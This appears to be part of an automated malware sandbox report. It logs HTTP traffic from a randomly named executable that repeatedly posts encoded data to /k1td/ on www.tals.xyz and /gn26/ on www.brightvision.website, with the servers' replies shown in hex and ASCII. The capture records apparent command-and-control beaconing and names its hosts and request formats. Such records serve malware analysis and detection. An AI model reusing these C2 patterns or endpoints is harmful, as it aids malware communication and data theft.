                                                                              Data Raw: 44 7a 4c 54 63 3d 6c 47 6b 52 7a 49 4f 68 36 7a 51 32 66 33 7a 66 57 4c 65 6c 71 64 4e 43 48 32 4f 54 6c 51 64 33 58 46 74 32 41 7a 4a 50 30 52 50 65 67 6f 66 66 6b 4f 53 47 33 5a 56 73 52 73 54 67 6b 50 37 63 58 63 62 49 6c 71 6f 48 49 76 50 77 69 4b 77 65 59 55 45 52 58 6c 62 33 64 67 74 6f 4a 54 36 4e 46 45 58 59 48 67 6f 41 59 64 73 4d 38 39 32 70 48 58 61 78 48 65 66 54 73 30 47 4b 34 56 32 67 78 59 53 30 4e 42 6c 61 61 44 44 45 72 6a 6f 6d 68 33 59 58 6a 41 55 31 6b 36 6b 59 4b 4e 72 71 4a 65 59 37 64 64 63 2b 51 5a 68 53 46 6e 36 46 7a 65 4b 78 7a 2f 57 50 4d 34 73 57 65 67 2f 6f 50 56 50 62 6c 63 38 3d
                                                                              Data Ascii: DzLTc=lGkRzIOh6zQ2f3zfWLelqdNCH2OTlQd3XFt2AzJP0RPegoffkOSG3ZVsRsTgkP7cXcbIlqoHIvPwiKweYUERXlb3dgtoJT6NFEXYHgoAYdsM892pHXaxHefTs0GK4V2gxYS0NBlaaDDErjomh3YXjAU1k6kYKNrqJeY7ddc+QZhSFn6FzeKxz/WPM4sWeg/oPVPblc8=
                                                                              Jan 11, 2025 09:29:39.304763079 CET73INHTTP/1.1 405 Method Not Allowed
                                                                              content-length: 0
                                                                              connection: close


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              30192.168.2.85000713.248.169.48803920C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 11, 2025 09:29:41.385353088 CET639OUTPOST /k1td/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 226
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.tals.xyz
                                                                              Origin: http://www.tals.xyz
                                                                              Referer: http://www.tals.xyz/k1td/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Data Raw: 44 7a 4c 54 63 3d 6c 47 6b 52 7a 49 4f 68 36 7a 51 32 51 31 6e 66 47 63 4b 6c 2f 4e 4e 42 49 57 4f 54 2b 41 64 7a 58 46 68 32 41 79 4e 66 30 6a 37 65 68 4b 58 66 6c 50 53 47 77 5a 56 73 45 63 53 6b 71 76 37 74 58 63 58 71 6c 71 55 48 49 75 76 77 69 50 4d 65 59 6b 34 57 59 56 62 69 44 41 74 75 58 6a 36 4e 46 45 58 59 48 6a 56 64 59 64 30 4d 38 4e 6d 70 48 32 61 77 5a 75 66 63 76 30 47 4b 75 6c 32 6b 78 59 53 7a 4e 41 70 77 61 42 4c 45 72 6e 73 6d 67 6a 45 57 32 77 55 4a 36 4b 6c 34 44 34 4f 34 4f 75 30 41 56 50 30 71 51 35 78 33 4a 78 4c 76 70 38 43 33 77 2f 2b 6b 4d 37 45 67 62 58 69 41 56 32 66 72 37 4c 71 6d 46 4a 78 4b 56 75 6b 51 66 63 76 64 6d 2b 33 46 50 34 35 49
                                                                              Data Ascii: DzLTc=lGkRzIOh6zQ2Q1nfGcKl/NNBIWOT+AdzXFh2AyNf0j7ehKXflPSGwZVsEcSkqv7tXcXqlqUHIuvwiPMeYk4WYVbiDAtuXj6NFEXYHjVdYd0M8NmpH2awZufcv0GKul2kxYSzNApwaBLErnsmgjEW2wUJ6Kl4D4O4Ou0AVP0qQ5x3JxLvp8C3w/+kM7EgbXiAV2fr7LqmFJxKVukQfcvdm+3FP45I
                                                                              Jan 11, 2025 09:29:41.832416058 CET73INHTTP/1.1 405 Method Not Allowed
                                                                              content-length: 0
                                                                              connection: close


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              31192.168.2.85000813.248.169.48803920C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 11, 2025 09:29:43.936975956 CET1656OUTPOST /k1td/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 1242
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.tals.xyz
                                                                              Origin: http://www.tals.xyz
                                                                              Referer: http://www.tals.xyz/k1td/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Data Raw: 44 7a 4c 54 63 3d 6c 47 6b 52 7a 49 4f 68 36 7a 51 32 51 31 6e 66 47 63 4b 6c 2f 4e 4e 42 49 57 4f 54 2b 41 64 7a 58 46 68 32 41 79 4e 66 30 6a 6a 65 68 2f 62 66 6b 73 71 47 78 5a 56 73 46 63 53 70 71 76 37 4b 58 63 66 75 6c 71 5a 36 49 72 72 77 6a 70 34 65 54 33 67 57 50 46 62 69 4c 67 74 72 4a 54 37 51 46 45 48 63 48 67 74 64 59 64 30 4d 38 4c 4b 70 4f 48 61 77 62 75 66 54 73 30 47 65 34 56 32 63 78 59 4b 38 4e 41 74 4b 61 79 7a 45 71 48 38 6d 69 51 73 57 30 51 55 78 37 4b 6c 61 44 34 4c 6d 4f 75 6f 4d 56 4b 67 41 51 37 68 33 4b 56 61 77 36 74 47 42 70 4f 69 36 4e 4a 67 39 43 30 4f 38 52 48 58 6e 35 74 75 61 50 63 6c 6d 62 59 59 34 4c 4c 4b 31 37 4a 50 2b 47 65 73 58 36 73 69 4a 34 37 2f 48 67 70 6c 46 54 58 2b 72 4b 77 61 2b 79 71 77 32 64 50 6e 7a 42 37 70 42 78 64 38 64 48 31 30 50 50 76 49 7a 51 61 4e 46 45 41 6f 30 73 6f 69 44 69 31 39 6e 46 74 53 73 35 69 4d 34 79 56 4d 78 58 43 46 30 45 36 70 65 71 4c 6d 30 68 69 6a 79 66 65 31 6f 32 72 78 2f 51 74 79 75 78 79 67 6c 53 63 79 65 7a 75 72 35 [TRUNCATED]
                                                                              Data Ascii: DzLTc=lGkRzIOh6zQ2Q1nfGcKl/NNBIWOT+AdzXFh2AyNf0jjeh/bfksqGxZVsFcSpqv7KXcfulqZ6Irrwjp4eT3gWPFbiLgtrJT7QFEHcHgtdYd0M8LKpOHawbufTs0Ge4V2cxYK8NAtKayzEqH8miQsW0QUx7KlaD4LmOuoMVKgAQ7h3KVaw6tGBpOi6NJg9C0O8RHXn5tuaPclmbYY4LLK17JP+GesX6siJ47/HgplFTX+rKwa+yqw2dPnzB7pBxd8dH10PPvIzQaNFEAo0soiDi19nFtSs5iM4yVMxXCF0E6peqLm0hijyfe1o2rx/QtyuxyglScyezur5pIi0Kn3JtYkZsT+C1kehZ9qAOpE3Lnb3/R3in6/cpB6q9BCZ8F+kWQAUmAIYf0S3P9qgyOfDn0MhqF8348UgCtQIdYLieMiJeeq2A3+6ebvVu1ZWmfYv9A6YwGF8NwxVDb6C69J75XU2ZPfm3OtkQxLDJ7tGGm5ILzomDoprKXzyvbxJfwpR84Kjmj50vGDKl99dDhTUlqv9WJeb0NKrONnUuX7ynYs/LrUYfJ94Gf+SKHTjHuxIrF0G9H6meE8IVMg/Gyiy1SZxGkWlyjFRT+32rBCTjOcwyfSq9aW21NwMPQp3th29SF6dfGbGhTHfyR3AJ+IZiCSA+eRiNAbcejEbHqJAArDnZWQggkKrtnYZMHn0BqIWd7fs2zyrhyvAaU6JX74Zp5Q1ZC00u0SmGn2rSaNjNrliW4lgM1d9VNOe2X8zkqMyOkhsNmVXn2suWG3fQgQ8sYQVlTYQZTO1XS5LW+sT2TOuQy/2+c/9+YROlKMVa64S/PwNep/KGC1zSmQE/3Mm71rOSxX+35KQgWb2aNA+Fo2s98Wr4wLpezLn6cZEhjaOnI1mJO2DVh18QDa23QawPYHbM92dvAvIusEd7lC/8NM5ykBxG860qDzabZUyJwuJ1rPpxtlKl4EHxx8XIsp57mTWVqs4Cp7vsr/Xrl/9zqThw+ [TRUNCATED]
                                                                              Jan 11, 2025 09:29:44.399095058 CET73INHTTP/1.1 405 Method Not Allowed
                                                                              content-length: 0
                                                                              connection: close


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              32192.168.2.85000913.248.169.48803920C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 11, 2025 09:29:46.490703106 CET372OUTGET /k1td/?m8=urJ0WtmP0FPTTB&DzLTc=oEMxw+ab8QlEZmTmAbDEuuFmAVWx5xMHQHNpbkBMxCjDr7HlodnZgfFsQKGKkvz/XYzpvPMYep3+sZsYYHcCTHyrYyRaD0W2SHbUYxhUJeAm2Jm3PlTqYYqojkKZ3lrXmQ== HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Connection: close
                                                                              Host: www.tals.xyz
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Jan 11, 2025 09:29:49.982904911 CET392INHTTP/1.1 200 OK
                                                                              content-type: text/html
                                                                              date: Sat, 11 Jan 2025 08:29:49 GMT
                                                                              content-length: 271
                                                                              connection: close
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6d 38 3d 75 72 4a 30 57 74 6d 50 30 46 50 54 54 42 26 44 7a 4c 54 63 3d 6f 45 4d 78 77 2b 61 62 38 51 6c 45 5a 6d 54 6d 41 62 44 45 75 75 46 6d 41 56 57 78 35 78 4d 48 51 48 4e 70 62 6b 42 4d 78 43 6a 44 72 37 48 6c 6f 64 6e 5a 67 66 46 73 51 4b 47 4b 6b 76 7a 2f 58 59 7a 70 76 50 4d 59 65 70 33 2b 73 5a 73 59 59 48 63 43 54 48 79 72 59 79 52 61 44 30 57 32 53 48 62 55 59 78 68 55 4a 65 41 6d 32 4a 6d 33 50 6c 54 71 59 59 71 6f 6a 6b 4b 5a 33 6c 72 58 6d 51 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?m8=urJ0WtmP0FPTTB&DzLTc=oEMxw+ab8QlEZmTmAbDEuuFmAVWx5xMHQHNpbkBMxCjDr7HlodnZgfFsQKGKkvz/XYzpvPMYep3+sZsYYHcCTHyrYyRaD0W2SHbUYxhUJeAm2Jm3PlTqYYqojkKZ3lrXmQ=="}</script></head></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              33192.168.2.850010203.161.42.73803920C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 11, 2025 09:29:55.027281046 CET655OUTPOST /gn26/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 206
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.brightvision.website
                                                                              Origin: http://www.brightvision.website
                                                                              Referer: http://www.brightvision.website/gn26/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Data Raw: 44 7a 4c 54 63 3d 53 69 42 7a 57 57 4a 31 73 4f 54 33 51 31 56 38 6c 4b 55 53 31 47 47 6a 68 70 4e 64 55 76 35 63 44 46 68 4c 76 4e 49 75 64 59 6a 6d 52 58 38 79 47 4d 59 6f 72 32 35 48 30 57 72 68 4a 6e 71 31 51 38 69 63 56 4c 32 75 36 4c 67 54 34 49 71 35 74 54 6a 7a 68 63 55 32 44 46 46 4d 42 61 31 56 61 4c 66 66 4c 2f 58 65 30 6d 41 55 75 6d 75 4b 74 32 50 37 52 47 34 4a 2f 45 71 77 50 44 50 30 51 70 35 67 77 4a 4b 54 51 78 75 41 4e 38 55 4a 2b 53 77 35 75 71 50 62 56 59 70 66 4d 44 46 63 6a 63 67 71 58 74 6e 4e 62 32 56 5a 50 56 48 46 57 7a 67 38 46 63 6c 39 6c 6d 6b 6e 66 6b 48 6d 34 6d 49 5a 71 65 67 3d
                                                                              Data Ascii: DzLTc=SiBzWWJ1sOT3Q1V8lKUS1GGjhpNdUv5cDFhLvNIudYjmRX8yGMYor25H0WrhJnq1Q8icVL2u6LgT4Iq5tTjzhcU2DFFMBa1VaLffL/Xe0mAUumuKt2P7RG4J/EqwPDP0Qp5gwJKTQxuAN8UJ+Sw5uqPbVYpfMDFcjcgqXtnNb2VZPVHFWzg8Fcl9lmknfkHm4mIZqeg=
                                                                              Jan 11, 2025 09:29:55.602107048 CET1236INHTTP/1.1 404 Not Found
                                                                              Date: Sat, 11 Jan 2025 08:29:55 GMT
                                                                              Server: Apache
                                                                              Content-Length: 16052
                                                                              Connection: close
                                                                              Content-Type: text/html
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                              Jan 11, 2025 09:29:55.602121115 CET224INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                                              Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)"
                                                                              Jan 11, 2025 09:29:55.602139950 CET1236INData Raw: 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69
                                                                              Data Ascii: style="display:inline;fill:#000000;fill-opacity:1;stroke:#000000;stroke-width:0.1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" d="m 145.0586,263.51309 c -90.20375,-0.0994 -119.20375,-0.0994 -119.20375,-0.09
                                                                              Jan 11, 2025 09:29:55.602150917 CET1236INData Raw: 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 34 39 36 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22
                                                                              Data Ascii: ;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.0036,3.37532 -0.0071,6.75165 -0.0107,10.12897 m 0.512159,0.18258 c -1.914603,-0.23621 -3.505591,1.17801 -4.861444,2.68113 -1.355853,1.5
                                                                              Jan 11, 2025 09:29:55.602180958 CET1236INData Raw: 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 31 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 37 34 2e 36 38 37 35 2c 31 32 35 2e 30 33 37
                                                                              Data Ascii: ;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -13.197555,13.3433 -18.781379,20.01048 -5.583823,6.66719 -10.749655,13.66605 -13.
                                                                              Jan 11, 2025 09:29:55.602194071 CET672INData Raw: 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a
                                                                              Data Ascii: #000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.45836 13.7917,12.9167 19.98957,19.14581 6.19786,6.22912 11.6978
                                                                              Jan 11, 2025 09:29:55.602205992 CET1236INData Raw: 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e 39 33 37 35 2c 31 32 34 2e 30 39 39 39 38 20
                                                                              Data Ascii: /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.66653,18.58299 3.08
                                                                              Jan 11, 2025 09:29:55.602217913 CET1236INData Raw: 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e 38 32 36 36 38 2c 37 2e 34 32 34 34 37 20 32
                                                                              Data Ascii: 943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.003429,37.18159 -3.0
                                                                              Jan 11, 2025 09:29:55.602229118 CET448INData Raw: 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                                              Data Ascii: 54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.23266 c -5.440192,
                                                                              Jan 11, 2025 09:29:55.602289915 CET1236INData Raw: 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74
                                                                              Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa
                                                                              Jan 11, 2025 09:29:55.607183933 CET1236INData Raw: 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65
                                                                              Data Ascii: 45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717" rx="2.5"


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              34192.168.2.850011203.161.42.73803920C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 11, 2025 09:29:57.582504034 CET675OUTPOST /gn26/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 226
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.brightvision.website
                                                                              Origin: http://www.brightvision.website
                                                                              Referer: http://www.brightvision.website/gn26/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Data Raw: 44 7a 4c 54 63 3d 53 69 42 7a 57 57 4a 31 73 4f 54 33 52 55 6c 38 6a 72 55 53 39 47 47 67 39 35 4e 64 43 66 35 59 44 46 39 4c 76 49 70 70 64 71 33 6d 52 79 41 79 48 4e 59 6f 6f 32 35 48 37 32 72 6b 4e 6e 71 75 51 38 76 6a 56 4b 4b 75 36 50 77 54 34 4a 61 35 73 67 37 77 69 73 55 77 4d 6c 46 30 46 61 31 56 61 4c 66 66 4c 35 36 7a 30 6e 6f 55 75 57 2b 4b 73 58 4f 4a 59 6d 34 4b 34 45 71 77 4c 44 4f 39 51 70 34 46 77 49 57 71 51 33 71 41 4e 34 45 4a 2b 6a 77 36 68 71 4f 51 52 59 6f 49 4c 41 68 58 6b 4e 59 75 57 50 37 69 45 6b 6c 48 44 44 32 76 4d 52 6f 36 47 63 4e 57 6c 6c 4d 52 61 54 61 4f 69 46 59 70 30 4a 32 34 68 69 76 4b 32 78 36 71 53 70 34 6d 72 33 47 6a 6e 4f 58 58
                                                                              Data Ascii: DzLTc=SiBzWWJ1sOT3RUl8jrUS9GGg95NdCf5YDF9LvIppdq3mRyAyHNYoo25H72rkNnquQ8vjVKKu6PwT4Ja5sg7wisUwMlF0Fa1VaLffL56z0noUuW+KsXOJYm4K4EqwLDO9Qp4FwIWqQ3qAN4EJ+jw6hqOQRYoILAhXkNYuWP7iEklHDD2vMRo6GcNWllMRaTaOiFYp0J24hivK2x6qSp4mr3GjnOXX
                                                                              Jan 11, 2025 09:29:58.153548956 CET1236INHTTP/1.1 404 Not Found
                                                                              Date: Sat, 11 Jan 2025 08:29:58 GMT
                                                                              Server: Apache
                                                                              Content-Length: 16052
                                                                              Connection: close
                                                                              Content-Type: text/html
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                              Jan 11, 2025 09:29:58.153764963 CET1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                                              Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                                                              Jan 11, 2025 09:29:58.153776884 CET1236INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
